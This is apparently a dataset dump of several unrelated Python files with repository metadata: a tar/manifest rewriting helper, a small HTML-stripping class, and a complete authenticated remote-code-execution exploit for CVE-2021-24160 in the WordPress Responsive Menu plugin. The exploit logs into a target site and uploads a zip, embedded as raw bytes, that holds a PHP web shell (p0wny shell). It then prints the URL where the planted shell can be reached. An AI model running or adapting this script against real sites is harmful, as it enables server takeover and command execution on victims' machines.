cfg_raw = json.dumps(cfg)
cfg_hash = hashlib.sha256(cfg_raw.encode('utf-8')).hexdigest()
cfg_name = cfg_hash + '.json'
# add cfg to resulting archive
# unfortunately, tarfile requires us to use a tempfile :-(
with tempfile.TemporaryFile() as tmp_fh:
tmp_fh.write(cfg_raw.encode('utf-8'))
cfg_size = tmp_fh.tell()
tmp_fh.seek(0)
cfg_info = tarfile.TarInfo(name=cfg_name)
cfg_info.type = tarfile.REGTYPE
cfg_info.size = cfg_size
out_tarfile.addfile(cfg_info, fileobj=tmp_fh)
    # now we finally need to patch the manifest
manifest['Config'] = cfg_name
# wrap it in a list again
manifest = [manifest]
with tempfile.TemporaryFile() as fh:
manifest_raw = json.dumps(manifest)
fh.write(manifest_raw.encode('utf-8'))
size = fh.tell()
fh.seek(0)
manifest_info = tarfile.TarInfo(name='manifest.json')
manifest_info.type = tarfile.REGTYPE
manifest_info.size = size
out_tarfile.addfile(manifest_info, fh)
def _filter_single_tar(
in_file: tarfile.TarFile,
remove_entries,
):
print('looking for: ' + ', '.join(remove_entries))
temp_fh = tempfile.TemporaryFile()
temptar = tarfile.TarFile(fileobj=temp_fh, mode='w')
for tar_info in in_file:
if not tar_info.isfile():
temptar.addfile(tar_info)
continue
if tar_info.name in remove_entries:
print(f'purging entry: {tar_info.name}')
continue
# copy entry
entry = in_file.extractfile(tar_info)
temptar.addfile(tar_info, fileobj=entry)
size = temp_fh.tell()
temp_fh.flush()
temp_fh.seek(0)
return temp_fh, size
| 32.348485
| 99
| 0.645433
|
c6cdf3f92c71644f0a872fbc8f463c117c85de2a
| 362
|
py
|
Python
|
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | 6
|
2016-03-11T08:31:02.000Z
|
2020-06-25T14:12:47.000Z
|
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | null | null | null |
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | 1
|
2018-03-24T13:06:25.000Z
|
2018-03-24T13:06:25.000Z
|
from HTMLParser import HTMLParser
__author__ = 'dimitrovdr'
#taken from http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
| 25.857143
| 88
| 0.671271
|
cc029f2dd3c284677dee407de840aff596c425ed
| 16,746
|
py
|
Python
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 26
|
2021-06-02T06:53:18.000Z
|
2022-03-24T07:06:00.000Z
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 4
|
2021-07-17T05:39:35.000Z
|
2022-03-24T08:24:10.000Z
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 6
|
2021-07-26T04:29:31.000Z
|
2022-03-21T17:34:44.000Z
|
# Exploit Title: Wordpress Plugin Responsive Menu < 4.0.4 - Remote Code Execution (Authenticated)
# Date: 05.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://responsive.menu/
# Software Link: https://downloads.wordpress.org/plugin/responsive-menu.4.0.2.zip
# Version: 4.0.0 - 4.0.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24160
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24160/README.md
'''
Description:
In the Responsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing
malicious PHP files that would get extracted to the /rmp-menu/ directory.
These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow
an attacker to execute commands to further infect a WordPress site.
'''
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _ __ ___
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / |/ /_ / _ \
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | '_ \| | | |
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| | (_) | |_| |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|\___/ \___/
 * Wordpress Plugin Responsive Menu < 4.0.4 - RCE (Authenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Responsive Menu 4.0.0 - 4.0.3 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Exploit:
'''
print('')
print('[*] Starting Exploit:')
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-post.php'
# Header (Exploit):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "application/json",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=rmp_menu&page=themes',
"Cache-Control": "no-cache",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------12473561203192832341566500492",
"Origin": "http://" + target_ip,
"Connection": "close"
}
# Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell)
body = "-----------------------------12473561203192832341566500492\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nrmp_upload_theme_file\r\n-----------------------------12473561203192832341566500492\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x00\x08\x00\x08\x00\xef\xbb\xb9R\x00\x00\x00\x00\x00\x00\x00\x00TB\x00\x00\t\x00 \x00shell.phpUT\r\x00\x07\xb3l\xad`-\xe2\xe2`\xb3l\xad`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\xc5\x1b\xffz\xdb\xb6\xf1?\x05\xcax\x11\xd5H\xa4l\xd7I+[r\x13\xdbY\xd2\xb9M\x16;\xdd\xf6Y\x9eF\x91\x90\xc4\x9a\"9\x92\xb2\xecU\xee\xb7\xa7\xd9\x83\xedIv\x07\x80\x14H\x82\x94\x94d\x1b\xd3J\"p\xb8\xdf8\x1c\x0e\xf0\xf1I8\rwv\xc6s\xdfN\xdc\xc0'cj%\xf3\x88^N\xa9\xe7\xe9\xbb\xf6\xcci\x91]{\xe14\xc9\xaf;\x04\x9e\xdd8q\x82yBz\xc4\x8a\"\xebAo\x1e\xed\xb0vwL\xf40\xa2\x93\xe1\xccJ\xec\xa9\xae\x99\x1d\xc4_\xdb\x0e|\xec\x9a\x1a\xa2\x989\xcd\x14\x07>\xa6IB+\x8e\xd9\xfb#\xa1^L+1<\xd3\x8dgM\xf8\xad\xef\xf7\x9f\xee5O\xd4\xf8\xec\xa9\xe3F:\xe3\xf4(k\xac@w\r?o\x94(\xe1\x93\x81K8\x04b\xd6|\xbdw#zjXv\x82\x85\xef\x05\x16R\xe2\x84\xbe\x0c\xeb\x12\xda\xed\x04\x88(\xd83\xb3\xeb\x99@S!\xd1:\xb6\xe8=\xb5S\xaf\xe0\x9e\x90\x0e\xe7n \x88q\xdf\xc8Fi\x1cT#\xbd~:\xac\xb5\xea\x04\n\xacgB\x13\xf8\xa97Y\x0f\xa0},{\xe5{\xec\x17<\xe6H\x95\x90\xa8\xc7\xbfq\xfdD\xdf\x1d\xbb\x1e\xfd\xc9\x9aQ\xee\xd9\xf0\x99<\x844E[\x12\x1b\x8d\xcc H\xafG\x1a zC6\x1e\xea\x02&\x83f\x07\xb3pB}\xd2\xb6I\x86_\xab\xd0li\xcc\xb8<fG\x064G\xaeo\x8e\xacx\x8a\xe8\x07\x1a6\x0f4\x01\xc9F\xc6\x00E\xefC/p\xa8\xae\r|p\x86\x18\xe7\xef03WS\x08\xa3\xb6O\x83\xe1h0\xf3\xb0\x9f\xad\x1a\x1b\xac<\x08A\xdf[\xc94\x8b\r\xd8\x00\x9c|\x8f\xdfC\xb0\xc4\xd0\x0e\xfc\x84\xfaI,\xc1JJ\xe5\xe0\xa0\xd5\xd7//.\xcfe\xad\xaa\xd9d\xacr\xf7a\xbc\xf2\xee\xc6kD\xe3\x07\t\x19\x07s\xdf!&\xfc\x06\x04\x96CB\x1a\xcd\xdc8\x06\xde\x8dF\xb3\x95G\x03\xf6m\x94\x9cN\x08\xad4Z\rK>\xd8\x8d!\x03\x13Q|\x91\xc4-\x90\xc5\xf6\x0c\xf4\xf97C\xea\xdbh3\x06_\xe6A\xa5\xfe\x8f!W~\x08\xd8[\\\xe5\xf9\x08]r\xe0\xdd1\xb3I\x10R?\x1d\xd6X\x8c\x1a9K|\x013\xbc\xf5\xef,\xcf\x05\xad\x03\x05n\x84E\xe4&\xf4\xcbZa\xccp\x02\xc3\xadT\x83\x0e\x954(E\xaa\xb1\xed\x051\xb6\x97C\xe1f\xf2\x9c\x05>\xfd\x04\x8e\xd1f\xa8S\x10\x99B\xac\x19\xfe\xfe\xfc\xeaZ\x13\xb6\xd3nX\xe0\xe7V\x89h\x1c\x06~\x8c\x13\xe6\xa7\x8f\x17\x17b\x1d\x8d\x17.\x84eR\x1e(Gf\x90\x1cb*\xcep\xad\x9bcO\x04\x8c\xdd\xe1\xfbw\x97W\xd7,X\xdd\x1c\xe5 \x90\xb5\xaf\xa4\xc5\xa5a\xee\xf7\xcd\x86bU\xca\xa14 \xf2\x11\\j\x1ayl\x8fy\xea\x92H\xaa4\x82s\xc5B\xf5M3\x8fh\x04\x13\xf6\xf6\xa8 a\x08\x80\xddu\x14\xd8\x92\xb0\x01\xb2)\x84\xfe\xf5\xd8\xf8\x02!\xd4\x87.\xc5\xe6\xf6Mk\xa5R\xb0\xbf\xf4\x8a\xebBc\x13a\x1as6o\x1bk9H\xe7\xb7 \x80\xb3I&\xc8\x02H\x91\x9f\xfc\x1a<\x85\xd8G#];\xe5\xc1\xb7}\x05<v\x89\x15\x86\x9ek[\x18J\xcc_\xe2\xc0\xd7\xc4 jO\x03\x82\rY,Jy\x12\x00\x8eKu\xbe\x12\x9c\xf4\x8f\xbf:{wz\xf5\x97\xf7\xe7d\x9a\xcc\xbc\xfe\xce\xce\xb1\xf8F\xc0c$\xdc\xcf\xe4;\x9e\xd1\xc4\x82hdE0\x11z\xda\xc7\xab\xd7\xedo5bJ\x00\x89\x9bx\xb4\x1fv\x16\xfe\xc3\xf7\xcc\x9b\xbb\xbf=96yk\x01\r\x9a\xa1\xa7\xdd\xb9t\x11\x06\x11$\x12ba\xe9i\x0b\xd7I\xa6=\x87\xde\xb96m\xb3\x97\x16q}7q-\xaf\x1d\xdb\x96G{{F'O6N\x1ed\x02Le 
\x05D\x94\xc0yP\xcc\x80\x99\x15M\\\xbfK:G\xa5\xae\xd0r\x1c\xd7\x9f(\xfbF\x96};\x89pI\xea\x92'\x07\x07\x07e\x08;\xf0\x82\x08:)\xa5\xe5\xce1H\xd8\x1e[3\xd7{\xe8\x92Y\xe0\x07qh\xd9\xb48\xfdr\xaf_w\xbb\xed\x05\x1d\xdd\xba\t\x88\x1e\x05\x9e7\xb2\xa2v\x12\x01\x1f\n\xa9FA\x04^\xd2\x8e,\xc7\x9d\xc7]\xf2mx_'B;\xe5\xf5\xe0\x10\xffm\xcd\x86\x82\x01f\xac\n\xc2S\xeaN\xa6\x89\xa2s#\x89\xa7\xf3\xd9\xe8\x13%N\xb1\x8d\x82\xfbv<\xb5 \xe9\xee\x82;\x81\x03\x93\x0e\xfc{\x1e\xde\x93h2\xb2\xf4N\x0b\xff\x19\x07\xcd\x8dt6\xb2\xf1_\xad O\x98\xff\xab\x98\x96\xbdh\xbfLpf\xdd\xb7S]v:*\xa1R\x07>\x84^b\xcd\x93\x00D\xc1/\x05\xf3\x92\xd8(\xf0\xe1J`\xc2\xffS\xca\xcc|5v\xff\x01af\xaf\x13&e\x00\xc7\x8dC\xcf\x02G\x1e{T\xc1 \xb6\xb6!k\xa1,\xd3\xe9\xe2\xc4\x98\xcf\xfc2\x1c\xe4\x17\x13\xbf\r\t\xc0\x0c\xec\x17'\xb0\x9c\xdb\xd3\r\xd4\xda\x16\xd1B\xa1\xde\xd4\xd1\x0e\xd5\x9a\x0b\xeeh4\xf6P\x1bj}e\xf3\xffP5z1\x05V\xdbl\xdevqC\xd7^DVX!=\xd8\x18\xa8\xecm\"\x8d\x17L\x02\x85(\xcc\x08\x0b!\xcf(\xf0\x9c\xea\x80\xf3\xfa\xf57{\xdf*BVB\xef\x936S2\xd8\x00\x14F\xa3Z~\xbe\x9fQ\xc7\xb5\x88.y\xe0w\xdf\xed\x85\xf7\xaa4\xa2\x9e\xf7\x8c\xeeD\xcfU\xda\xc4'\xf5\xe4\xf6>z\xa6B\x82\x02\x87\xf8\xacb{\xabz\x9a1@\xa1\xbb\xbdN\xe7wj\xf2B\xc8j\x00I\x13>\xa4\x8f\x1b\xf1W\xcb\x13\x17\xb8\x9d\x04\xa1r\x8dy\xdc\xd2</\x9e\xbf\xa85\x8f\xeb\x87s\xd54\xc1g\xd3I\xba-O\x07\xfb\x9d/\xe02\xca\tX\xcb\x8a\xc1\xd1\x87\x11\xec\xc2U2o1\x9f^\x1c\x9e\xbd\xee\xbc\xaa\x9d+yj}\x02Q\xc1W\x10M1\xee\xbd:\xfd\xee\xfc\xc5&\xd1\xa0\xcadkBn>\xd2\xb7\xf7p:m\x12\xea\xc5\"\xca\x1c\x92\x81\xef\x1f\x1e\xb6\xc8\xea\xc3\xe8\x1c6I\x1c\xe0Fpo\xcd\xe2\x9d\x13\xa0O<kDU\xd3@\n\x8f\x8a\x19\x90\x899\xf2\x02\xfb\xb6\xdc\xbf\xca\xd0\xd4.\x92N\xfa\x03e\xfc\xf7\\\x9f\xb6\xabA\xea\x04J\x97\x1e\xd8=U/;\x9fD\x15\x1fn\x86\xaa(#'\r\x90\xff\xf9\xe0l\x11\x84\xf3\xffB\x06\x9a\xc1\xd5\xad\xfe\xb5a\x93\xaf\xe91\xf5\xc6\x1b\xad99\x1d;\xee]\xbd\xc3\xecU\xd1\xdb>\x87\xe0\x14\xabf[0O\xd0j*\x83\xac\x82\xd0\xb1)\xb6\x1e\xd2^\xc4\x8e\xdc0\xc9oF\xee ]>\xfd\xd3\x19l\t\xfd\xb9\xe7\x1d\x95\xfa\xec`6\xb3|\xe7\x8d\x1b'A\xf4\x00`\xd77e\xa0)\xef}\x1f\xc4.\xab\x1e\xf5\x8a\x93\x07\x81\xf8\xf6\xfct\xe6\xbcebU\x11\x14`\"\x89J\xa1r`Y\x95j\x88\xd9r\x94\x9cr\x1eu\xc1\xab*\xbc\xe7\xb0\x1a\xae\xef\xd3\xe8\xcd\xd5\x8f\x17\xe4Y\x8fh\x03\xe0ke\xdb\xd5\x0ci\x1c\xb3\x88j{V\x1c\xf7\x06\x9a\x1cm\x07Z\xbfA\x9e\x91\t\xf5\xdf\xb3w\x1d\x94\xdb\x84\x86\x06\xd8\x03\xc6\xf4Ic+J\x14\xb6\x95!}\x03YE&\xddV\xe3\xb5\rD\xe3\x9b\x99\xab \xc4\xba\xae\xa2\xe7\r\x0b\x0e\xb5n[\xb4\xc8%+p\xe9\xa2h\xbf\x9d=$\x91sE\xff\xff\x91\x00\x0e\x1d\xd3H\x87\xcd\xbc\x87\x81M\xc5;l\xd0\xae\xdc\x19E\x01S0X\xc2\x9a\x9b\xe1\xcf\x95\xaa$\x87-Q\xa9\xf0\xed\xb2.\xb0\xc8\xc6\x0emx\xd1G>\t\xda5\x8d\x84\xc6I6X%\r\xe3.W\r\x12\xd0\x06\xaf\xd9\xe5QK\xa7A\xbbfsu\xa0\x93\x13\x9d\xd7Q3\xbel\x8fZ\xd1\x16\xdc\x98&y\x05:\xa5\xbe\xc3\x0f\x16\xc8\xd5\xf9\x87\x1f\t\xf5\xef\xdc(\xf0g\x18\x15 
N\xb8\xd6H\x14\xe2\xc1\x1c\x069E\x1ai\xb0J\xe3\x11\x19\xc3\x14$\x1f\xdf\x92\x11\xc4\x9b[JC\x88\xa8\xf0{\x0c\x06V\x12\xaerJ\x98\xf0\x8aY[*\x17\xcb\xcf\xcc\xba\xa5\x1f\xe8\xdf\xe7(\xafv\"\xf4\xdb\xe3U\xd4\x16\xf9\x15\x16\xean\xcam\x8b\xd8\x0bx\x838\xf1\xd8Z\xf9\x89\x9e\x15\xc6*(\xa4\xa6O\xe1\x8c\xa9\x15\xbf[`\xd4\t\xc1m\x1et^\xbc\xabTr\xfa\x14\xcfY2t>;\xb3\xca^\xf3g\x06[\xe9\"}\xf2\xb1!\xc3\xcc'\xb9\xf1K\xe0\xfa\xec8\xa9\xa9p)\xf9\x99\x87\x8e\x95\xd0\xd3\x85\xc4k\xfe\xd8\xb0\xc4\x9c\xb2\xe7Q\xe5\xb9\xdbLaV\xbdU\xa9\x17\xad\x92_\xec\x8c;\xcb\x9bS#\x89\xdc\x99\xde4<\xeaO\x92);\x04\xe94\xc51\xc1\x11s\xfb\xb1K=\x87\xb81\xa1\xb0r<\x90v\x1f\x1d|\n\x19%I\x02t\x97\xd0\xa3\t-\x87\x8aU\xf0\x8a\xb8\xcb\x9d\x8a\xb0\xa4\x83\xa6\xac*\x0f@6\xb1\x9f\x996N\xb9:\xee\x91\xbd<S~F\x1aH\x94\x89W\xa3B\x01\xf7\xd7\xb9\xaf8\xebT\x1cv\xaa\x1e\x95Zaz\xaeh_wnj\x1ca\x13/eI\xcf<\xc2\x14\xf6g\x81^E\xb5\xdeG+\xf8\x94\xf1\x1a\x11\x85\xbd\x84Mu\x93\xc7\xd4\xaf\x9b\xbbf+/\xc9\xf6>\xbdN\xc0\xc2\xa2\xa2b\xb3\x86h~\x02K\x06_;w\xcb\xec*j\x13\x92\xe6O\xd9\xc9\x92r\x12\xc1\x0e\xcc\x85\x98J4\x05)\xc4\xc0\x1d\x8a\xe8+L\xb2?\x82o\x9f\x10\r\\M#]\xa2!\xf7\x8a\xf4\x08\xd1\xa4G\xe4\x88*\xf3Q6\x101\xac\x90\x83\x99\x00\x93\xf4^\xa6\xdb&{7Geq\xe5%B\xa9\xb4\xd5\xba\xc1\x8e\x93ZJ\xa0j[\xa7\x07J\xddL\x165\x06|\xd2\x15\xa8\x1a\"a\xe7:\xf8\xa96\xb0zd1 \x95\x80\x9a\x05\xc5\xac\x89\xb9\xd92\xc5W'\xb6()T\xc0\xf6\x11\x1e\x9d\xf1\x1d\x84\x13\xd8s\xfci\xd8\x11`\xa1\xe7\xbcCoX\rUf\xc9{\r\xc8*^&\x10\xb0!u\xa0zc\x1a\xd1q\xa3E\x1a\xe8\xf3]\xf9p+\xb0\x13\n\xfbQ\xd8\xd9Y\xb3#~H\xdc\xc2\xfc\x9fq\xb6)\xf6\xf4\xb6\rP@\xb9\xea\xc6\xe1\x96\xce\x10e\x08\xccKp\x07\xa8\xc8M2\x91\xb1\x12i\x00\xc3\x90L\x9dN]\x0f\xa6<\xc7TC\xc3\x06\xe1n\x8b\xa7\x9ce\xa4\x11\x9d\x05wt\x1d\xd2|\xc8H\x8f\xb9\xb7J\x95EV\x1aJw?\xe4g3[\xb3\xad\xf4\xe6\xf6f'\xad-q\x83\xe2\xffl\x0f\xcbq\xce\xef\xe0\xc7\x05$\xb5\x14RR\xbdaO-\x82\xfc\xad\xb2\xc5\xaa\x85\x13\xb5\x83\x1bS\x97\x9d\xfaNh\xf2\x8a\xf9hJv\xddR#\x86\x1a\xc9\x94\xfa\xfa\x8aZ\xd5\xbcK\x1f9\xb45\xb2(&\x0e\xa5!\xfdE[v\t\xbf\x1d\x82\xb8x\x88\xfa\x8cD\x18\x9f\xff[zY\xb5\xe6mb\x9f2\xe3\x8d\x97>\x99\xfb\xb7>\xc4\x04\x02S\x91\xb2r\x97C\t\x8d\xa2 \"\x81\xcd\xd6\x17\xa74\x89\xea\xb8Q\xb5}\xf1\xd9^5\x8bW>\xc7m\x1c\xf8\x17\xe0\x05\xa75\xfbkqq\xc6\xa7\x0b\xf2\x9e\xfb_\xe6zh\x93\xc0\xbbc\x1b\x93_\xa8\xad,-\xe0\x83n\x1f\xb1\x9b\tXA\x02Dxm\xeb\x03\xbf\xaaP\xa18\x0en\x04,\x12\xe3\r\x89\x94$\xd0 \x82\xac.\x80\xe0u\xee%\xe9\x06Y\x84}\xdd\xc0\x14\x8e\xef\x89\xc9\xe3\x1a\"\xdc\x9a=!F-0~\xbd\x8c\xcf`\xe5\xf9\xf8\xe1B\xafXX\x8a&\xae\xb6FZ\x97\x92.q\xc9\x0f4c\xa2\n\x9f\xcb%\xd1~\xab\xc8\x8e\xe2i\x00Yd\n\xaa\xaeI@G\x9a\xac\x99Z\xb6\xeb\xe9\x93\x83:\xa3\xb1\x01\tu2\xdc\x12\n\xb5\x96$V\xb4\xff\xf3_\xa6\x06\xab\xaf\x84\xe5Z\xfa-xh\xef\xdf\x00\x8c\xb6\t\xe4\x9eb7Q\xcee\x85\xc3j\xf2\xe5\x12^!d\xd7Kz\x03\rI\xa1N\x81\xec@\xeb3\xc2)\xdb\xd0$J\x83O\xb4\xcdl\xb8\x8aP\x156\x14\xda\xaf\xd23/\xf7*\xed\x86\xcf\x90\xe3\x17nR9[\xd8\x06q\x03\xe5\xa8+!x\xdb\n\x16\x02)F\xae\x8d\xf3\x9cm9(\"\xff\x8f\x9b&\x9d\xb9Jd\x04\xdb\xf0\x9ah\xc5\x01\x94\x0c\xadvzO\xcdI\x8bhO\xadYx\xa4\xa9\x8b)+\xd8c\x0e\xeb%\xebA\xfb\x1ct\x82\xa0\x1bV9\xf3:\xaaJ\xab\xd8\xfe\x8b\x03\xc9\xb9\x15\x84t\x91X\xbdzx\xeb\xe8\xb9\xfa\xb7j\x9a\xcaxre\xb5|\x95|C\xd6\x03?\xdd\x16\xfe\x81>\xe0\x86@\xa7\x98\x1e)+\xb5\xe2~#\x030n\xe9C\x95o\xf1[{\xe7x T\xb8\xb6\x97\xe3A\xae\xddn\xb9w\xe6k\xfcU 
\x0eR\xb6\x1d^QP\xd0\x14\xf19}\n\x17\x03\xcb\xe2\xbe\x845h\xf11\xac\x11\x18\x03I\xf1l\xa7\x8fE\xab\xfaL\xac0\xa4\xdd\xde\xaaX2\xf2\xe6\x95\x8bt\xc5\x90\xac\xbe\x92;\xac\xba.\xf0QS\x19\xc2GT\xfe\xe5u\xbf\x16^\xc1\xc7\x18fH\xbc\x8e\xf7\xaa|\x91\xf5}\xa65q:lk\xcf\xa2\xda\xc4\xda\xb7N\xfc\x1a\x86\xea%)0\xf0\xecY\xcd\xa4Q\xf0\x8bu\x98Ob\xf8\x13\xa6\xd0F\x05\xc3\xcfw\xdf\x8d\xdc\xe6K\xbb\xfc\xa7\xbbZ\xe3\xca\x1a5\xaa\x9d\x8c\x07\xdb0b\xdfgtlA\xaa\\'\\\xae\x9c\xbeu8\xdb\xacd_\x8c\xbex\xff\\y!&\xe7W\xe1<\x9e2\xd02\xd9\xf2\x89\xb7\xd2'7[\xd2\xe4\x14i\x1ey-\xd8\x19G\xd6,\x86\xfdp\xcd.I\xde`\xfdqN\xa3\x87K\x96\x81\xd4V\x02,\xc5\xf9}\x86\x0f\xf6#:\x02\xc12\x89\xe7d\x9c\x87u\xe5{\x0eU<{\xc2\x95v\xddt\xb4\xb8z\xf9=\xf0\x8f\x1f\xde\x9eB\x1e\x00\xfb\"p\x02\xb6NCZ\xdc\xc3<Y\xd1\xcfi^\x03\xd8M\xddf\xbe\xa2D^\x93\xce\x02O\xbcL\xf0T\x95\xc5\x94G\xa2\xb6\xee\xa7\xe9\x16\xf3\xcf?^\xbcI\x9205\xa4\x02\x03\xc0\x1a\xec\x0fc4\xbcN\x0f\xf9/3v\x12)W~\x04\x8ei\"\xd0\xbdQ\\\xb3\x07\x04\x9a\\\x8b\xbco/\x16\x8b6\xd8q\xd6\x06\xc4\\q\x8eJ\x12\xc6\x87\x8f\xfb\xca\x878\x814\x90\xd7\x93\n{^\xa5\x9e\xd0\xe48\x9a\x8d\xbd\xc4\xb1,\x1eC\x9e>\xe5\x0cC\xd3<\xe6'?\x9d\xda<!\x89T\xb7\xdf\x8b\xdaM\xb3\xfd\x1fb6\xc7~\xb8|\xf7\x93\x11\xe2\x1d\xc1\x05\xef\xbd\xa2\xf7\xaa\x02\x9a\xfc\xa43I\x971\xd69\x0f\x8c\xe0\xa9#n\xd4\xd7\xfa\xb2\x07n\xafk\xe7lS\xbf\x98\xe2\x9f\x88!\x97xp\x97\xd2\xeb\x12\xe6\xcd\x0c\xdb\xe7\xfb\xac\xa2\xbc\xc0\xfd\xc5w\xf4b<\xa8\xcf\xab\xb3\xa4>\xf0Y)H\xf6\x82\xca\xbc\x9au\xe0\x01\r\xfb^.\xc9\xc2\xf5\x9d`a\xb0\xf7\x8a\x8a\x01\xf5\xf8]N\x18&\xa0\x81\xd1\xcb\xb4U5]\xd8i\x8e\x15\x01XJ\xca\x10\xaf@\x91\xbf\xc7\x91-v\"\x8a\x03\x16v\xbc\xc8\x06\xc0\xb8\t?\xcc\xc1C\x9c\xcb\xf3\x8b\xf3\xd3+\xad\xca\xa8\xd5[[%\x85\xaf2\xc9\x8c$\xc8t^\x81{\xd3\x85\xbf\xb0\xaa\x15\x84\x13\xfaS\x96\xaa*6_\xd2\xb5\xab5\xdb8v\xc4U\xb5\x87[]\xcbZ\x87\x85\x03\xaa0\xad\xca\x17\xd5dj\x15$9\xff\xb1)\xdfi;6\xf9\x1f\x05\xf1\x17\xac[J\x88\x83\xd7\xf7\\\xa7'\xfe\x92-\t\xee\x18\xb2\x95Ug\xc6|\xbf\xc4^\x1e\x0b\xbb-,A\r\x87\xc3\xe2\x00\"\xf5\x89N\tf\xb8z\x19\xf2\x0eV6\xea\x8b\x82\xd0\x0e\x02@\xab\t\xdf\x83l\xf8\x907\x0e\xf9 \x13_\x06\xd8\xba$K\x06\xc3\xc2\x0b1\x07&\xcc\x94%\xfb\x9dG\xbc$\r\x18\xc5\xc0`\xf0\x00 \x01\x91)5.\xf1u\xf87\x86\x9e\x03s.\xa0K\x1f6\x011P2\x0c \xb6,\"^\x0e\x9b\x8c:\xfc? ?\x13\xf8\xcf\x14(y#\xc3\xb0d\xf2\x0cD;\xd009\xc7\x84\x10\x15b\x03\xa1`\x18|\xc2\x979\xc01L\xe8%4\xb6\x90\x1a~\x0f\x97\x08\x91\xb5\xc3\xebr\x08\x1c\x13\x86z\x89\x03\x8a\xaa\xc0\xa6\x8ag\x99R\xe3\xdf\xeb\x9e\x82\xf1\x8a\xbd&8O\xc1\xefLp\xbcBS\xde\xc3\xd8\xb9\x95\xca\x11\xf9\x05fX\xec{\xd2\xbc\x95\x06\x8aj\x8c\xb8\xa3\x98o\xec\x9f\x9c\x9c\x1c\x9b\x0c\x83\xda\xc5\xcb\xad\xacG\xdcJur$\xf9\x1f\xcb\xb1\x9f\x81\x0f9\x19\x1ef\xf6\xb4\xca*\x8dfn\xa8\x99\\\x93\xf4zl\xf2\x89\xbd\x03\xb3\x9d\xfd9\xe0\x00PK\x07\x08\xad;\xa6\xce\xde\x0f\x00\x00TB\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\xef\xbb\xb9R\xad;\xa6\xce\xde\x0f\x00\x00TB\x00\x00\t\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00shell.phpUT\r\x00\x07\xb3l\xad`-\xe2\xe2`\xb3l\xad`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00W\x00\x00\x005\x10\x00\x00\x00\x00\r\n-----------------------------12473561203192832341566500492--\r\n"
session.post(exploit_url, headers=header, data=body)
print('[+] Exploit done !')
print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/rmp-menu/themes/shell.php')
print('')
| 133.968
| 12,564
| 0.706736
|
cd08e79491fedb650897d395314a27aacf3f1bcf
| 12,002
|
py
|
Python
|
